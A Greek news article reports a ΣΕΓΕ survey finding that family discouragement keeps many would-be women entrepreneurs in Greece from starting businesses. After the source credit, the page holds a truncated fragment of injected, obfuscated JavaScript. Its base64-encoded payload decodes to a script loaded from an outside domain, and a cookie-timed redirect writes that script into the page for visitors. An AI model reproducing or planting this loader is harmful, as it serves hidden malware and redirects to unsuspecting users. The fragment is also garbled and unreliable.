Τρικλοποδιά στην γυναικεία επιχειρηματικότητα η οικογένεια και οι φίλοι

Ενώ το 42% των γυναικών στην Ελλάδα θέλουν να δημιουργήσουν την δική τους επιχείρηση, δεν προχωρούν σε αυτό το μεγάλο βήμα επειδή δεν  έχουν την υποστήριξη από το οικογενειακό και φιλικό τους περιβάλλον.

Σύμφωνα με έρευνα του Συνδέσμου Επιχειρηματιών Γυναικών Ελλάδας (ΣΕΓΕ), που πραγματοποιήθηκε σε δείγμα 200 άνεργων γυναικών, οι σύζυγοι, είτε επειδή το εισόδημά τους έχει μειωθεί σημαντικά είτε επειδή μένουν άνεργοι, φοβούνται ότι τίθεται σε κίνδυνο το δικό τους οικονομικό στάτους, από την είσοδο των γυναικών τους στον επιχειρηματικό στίβο και την επιτυχία τους.

Πέντε στις 10 γυναίκες (ποσοστό 45%) θεωρούν όνειρο ζωής ή λύση την δημιουργία δικής τους επιχείρησης, όμως τέσσερις στις δέκα (ποσοστό 40%) δεν τολμούν να κάνουν το βήμα λόγω του αρνητικού οικονομικού περιβάλλοντος. Το 15% των γυναικών που συμμετείχαν στην έρευνα απέφυγε να απαντήσει.

Συγκεκριμένα, η έρευνα δείχνει ότι από το 45% των γυναικών που επιθυμούν να δημιουργήσουν τη δική τους επιχείρηση, το 42% προβάλλει ως βασική αιτία την αποθάρρυνση από το οικογενειακό περιβάλλον, το 25% αναφέρει ως ανασταλτικό παράγοντα την έλλειψη κινήτρων, το 15% την απουσία υποδομών στήριξης της οικογένειας και το 18% απαντά ότι δεν εκπληρώνει την επιθυμία για έναρξη επιχειρηματικής δραστηριότητας για άλλους λόγους.

Σε συνθήκες κρίσης θα μπορούσε να αναπτυχθεί η επιχειρηματικότητα πολύ πιο εύκολα απ’ ότι σε πιο ευνοϊκές συνθήκες, όταν ο πιθανός εργαζόμενος έχει να επιλέξει πολλές δουλειές, δήλωσε η Γενική Γραμματέας του ΣΕΓΕ Λίνα Τσαλταμπάση.
Η έρευνα, όπως τόνισε η Γενική Γραμματέας του ΣΕΓΕ, δείχνει ότι οι γυναίκες έχουν επιθυμία να αναπτύξουν επιχειρηματική δράση, αλλά «υποσκάπτονται από τον ίδιο τους τον περίγυρο, είτε γιατί υπάρχουν κοινωνικά δεδομένα είτε γιατί το έτερο φύλο- πατέρας, σύζυγος- πολλές φορές δεν μπορεί να δει την προοπτική ότι η γυναίκα της οικογένειας θα κερδίζει περισσότερα χρήματα από εκείνον ή θα είναι εντελώς ανεξάρτητη». Το μοντέλο αυτό, δυστυχώς δεν έχει καταρριφθεί απόλυτα, στην Ελλάδα και πολύ περισσότερο στις βαλκανικές χώρες, υπογράμμισε.

Η έρευνα παρουσιάστηκε σε ημερίδα που διοργάνωσε ο Σύνδεσμος Επιχειρηματιών Γυναικών Ελλάδας (ΣΕΓΕ) σε συνεργασία με το Βιοτεχνικό Επιμελητήριο Θεσσαλονίκης, με αφορμή τη συγκρότηση δικτύου υποστήριξης της γυναικείας επιχειρηματικότητας, της εκπαίδευσης και της ενδυνάμωσης των γυναικών στα Βαλκάνια – «Balkan Women Coalition For Professional Qualification and Training in the field of Business and Economic Science».

πηγή: iefimerida.gr

NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply